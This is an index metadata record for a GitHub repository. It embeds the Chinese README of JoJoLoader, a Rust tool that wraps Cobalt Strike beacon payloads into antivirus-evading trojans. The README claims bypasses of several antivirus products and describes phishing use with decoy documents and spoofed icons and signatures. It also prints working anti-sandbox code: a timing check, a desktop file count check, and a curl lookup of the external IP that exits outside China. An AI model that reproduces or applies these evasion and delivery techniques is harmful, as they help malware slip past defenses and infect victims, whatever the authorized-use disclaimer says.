{"id":22006207,"url":"https://github.com/pizz33/jojoloader","last_synced_at":"2025-04-04T19:11:48.936Z","repository":{"id":247569071,"uuid":"822780810","full_name":"Pizz33/JoJoLoader","owner":"Pizz33","description":"助力红队成员一键生成免杀木马，使用rust实现 | Help Redteam members generate Evasive Anti-virus software Trojan","archived":false,"fork":false,"pushed_at":"2024-08-07T06:02:48.000Z","size":793,"stargazers_count":542,"open_issues_count":0,"forks_count":79,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-03-28T18:13:45.563Z","etag":null,"topics":["beacon","bypass-antivirus","bypassedr","cobaltstrike","redteam"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Pizz33.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-01T20:07:12.000Z","updated_at":"2025-03-26T16:30:32.000Z","dependencies_parsed_at":"2024-11-05T15:38:08.739Z","dependency_job_id":"0727c06e-d231-47a0-b1cc-f95ea635126b","html_url":"https://github.com/Pizz33/JoJoLoader","commit_stats":null,"previous_names":["pizz33/jojoloader"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Pizz33","download_url":"https://codeload.github.com/Pizz33/JoJoLoader/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247234922,"owners_count":20905854,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","bypass-antivirus","bypassedr","cobaltstrike","redteam"],"created_at":"2024-11-30T01:10:17.742Z","updated_at":"2025-04-04T19:11:48.914Z","avatar_url":"https://github.com/Pizz33.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"![JoJoLoader](https://github.com/Pizz33/JoJoLoader/assets/88339946/dd259365-7334-43df-aee5-2d53d39c0fa9)\n\n# JoJoLoader\n\n助力红队成员一键生成免杀木马，使用rust实现 (by_hyyrent)\n\nHelp Redteam members generate Evasive Anti-virus software Trojan\n\n更新说明\n---\n2024/08/07 优化免杀效果：360全家桶✔ 火绒✔ def✔ （病毒库最新）\n\n![image](https://github.com/user-attachments/assets/1708a617-5d70-47d5-8fae-da0b92399f10)\n\n开发背景\n---\n\n由于近年使用go来开发loader越来越普遍，导致杀软对go编译程序静态查杀力度增大，尤其是某数字杀软\n\n对之前的go免杀项目千机多次优化后，发现效果仍不太理想，决定重构转投入rust的怀抱，因此有了此项目的诞生！\n\n使用方式\n---\n\n与之前开发的千机一样，同样是支持一键化生成，生成自动替换图标签名\n\n生成`stageless payload`\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/49ddd939-32c3-495f-8ab7-a6f649a3a138)\n\n把 `beacon_x64.bin` （习惯使用4.7以上版本的CS，默认名称即是，其他版本自行改名）放置在当前目录下\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/294efecb-b0bf-45cc-afac-7a107cac3b14)\n\n点击 `一键生成.bat`，等待免杀木马生成\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/6ad29be8-7a42-4348-8606-113caee887f0)\n\n输出免杀木马在 `output` 文件夹下，随机六位数命名\n\n其中sign标签文件为自动替换签名后的免杀木马，添加图标和签名最大化bypassQVM\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b30c675-acb4-40ae-9045-1d92afbc97b7)\n\n钓鱼场景-释放正常文档\n---\n\n贴合实战钓鱼场景，支持正常文件释放，捆绑文档存放在 `bundle` 文件夹下\n\n默认放置打开损坏文档，实战根据需求自行修改代码\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/4ca87739-3dfc-4a07-bda0-0cf5b0c90505)\n\n如果不需要捆绑文件，把对应行注释即可\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b5b4ed6-5f7f-431c-9502-be82a31dd74b)\n\n程序图标\n---\n\n在 static 目录下放置了四个常见图标，可修改`icon.rc`对应名称进行调用\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/9480ea64-e78f-4ce3-bda7-a2a6bc451688)\n\n免杀效果展示\n---\n**360和火绒**\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/b6fb7409-4560-493c-bf2e-a3198837ca70)\n\n**360杀毒**\n\n装了杀毒之后的360性能变强，qvm有时很玄学，如若碰到QVM情况尝试更换图标\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bfc2da65-49e7-4a97-bb83-9c0420edb034)\n\n**defender**\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f6c49329-8cd9-48d7-af33-130fa165c3ee)\n\n**微步**\n\n项目发布时现测试，测试结果为安全\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/1ebe6cba-b85e-4964-843a-1f54a279f591)\n\n卡巴斯基 ESET\n\n国外edr会扫描内存，需要对bin进行二开，单靠loader局限性很大，以下测试是基于二开的bin\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f5c66ab3-9034-49af-b01d-a7bc4bf12fc7)\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/5ce2e534-d1cb-4865-898b-6187dbf84d3d)\n\n环境安装\n---\nhttps://www.rust-lang.org/zh-CN/tools/install\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/a1b8b73a-5545-4797-b2d3-b2605640b7a7)\n\n下载安装相应的版本，双击运行，默认选择模式1进行安装，然后配置环境变量即可\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bb0a690c-1703-4b49-8b43-20b70de024a8)\n\n如若安装后编译失败运行以下命令\n\n```\nrustup default stable-x86_64-pc-windows-msvc\n```\n\n反沙箱\n---\n反沙箱不是越多越好，只保留比较好用的三个，兼容绝大部分环境，并且尽量避免上传沙箱后虚拟主机上线\n\n### 流速检测 ###\n\n```\npub fn flow_time() {\n    use std::time::{Duration, Instant};\n    use std::thread::sleep;\n\n    let start_time = Instant::now();\n\n    sleep(Duration::from_millis(5000));\n\n    let elapsed_time = start_time.elapsed();\n\n    if elapsed_time.as_millis() \u003c 5000 {\n        std::process::exit(1);\n    }\n}\n```\n\n这个函数判断时间是否在沙箱内进行加速\n\n### 检查出口 IP ###\n\n```\nfn ip() {\n    let output = Command::new(\"cmd\")\n        .args(\u0026[\"/c\", \"curl -s https://myip.ipip.net/\"])\n        .creation_flags(CREATE_NO_WINDOW)\n        .output()\n        .expect(\"Failed to execute command\");\n\n    if !output.status.success() {\n        std::process::exit(1);\n    }\n\n    let body = str::from_utf8(\u0026output.stdout).expect(\"Failed to parse response\");\n\n    if body.contains(\"中国\") {\n    } else {\n        std::process::exit(1);\n    }\n}\n```\n\n这个函数通过 `curl` 命令获取出口 IP，如果不在中国则退出程序\n\n### 检查桌面文件数量 ###\n\n```\nfn check_desktop() {\n    let desktop_path = get_desktop_path().expect(\"无法获取桌面路径\");\n\n    let entries = match fs::read_dir(\u0026desktop_path) {\n        Ok(entries) =\u003e entries,\n        Err(_) =\u003e {\n            std::process::exit(1);\n        }\n    };\n\n    let file_count = entries.filter_map(|entry| entry.ok()).count();\n\n    if file_count \u003c 10 {\n        std::process::exit(1);\n    } else {\n    }\n}\n\nfn get_desktop_path() -\u003e Option\u003cPathBuf\u003e {\n    let home_dir = dirs::home_dir()?;\n    #[cfg(target_os = \"windows\")]\n    return Some(home_dir.join(\"Desktop\"));\n    None\n}\n```\n这个函数获取桌面路径并检查文件数量是否小于 10，如果小于 10 则退出程序\n\n声明\n---\n- 仅限用于技术研究和获得正式授权的攻防项目，请使用者遵守《中华人民共和国网络安全法》，切勿用于任何非法活动，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任！\n\n- 使用前先按照文档步骤一步一步来，报错问题自行百度解决，类似issue不予回复，感谢理解！\n\nreference\n---\n代码有借鉴学习以下项目，commit当晚通宵没来得及写，现补上，另外免杀性失效自行修改代码，楼主仅提供一种思路，祝玩得开心♥\n\nhttps://github.com/joaoviictorti/RustRedOps\n\nhttps://github.com/xiao-zhu-zhu/RustBypassMap\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpizz33%2Fjojoloader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpizz33%2Fjojoloader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpizz33%2Fjojoloader/lists"}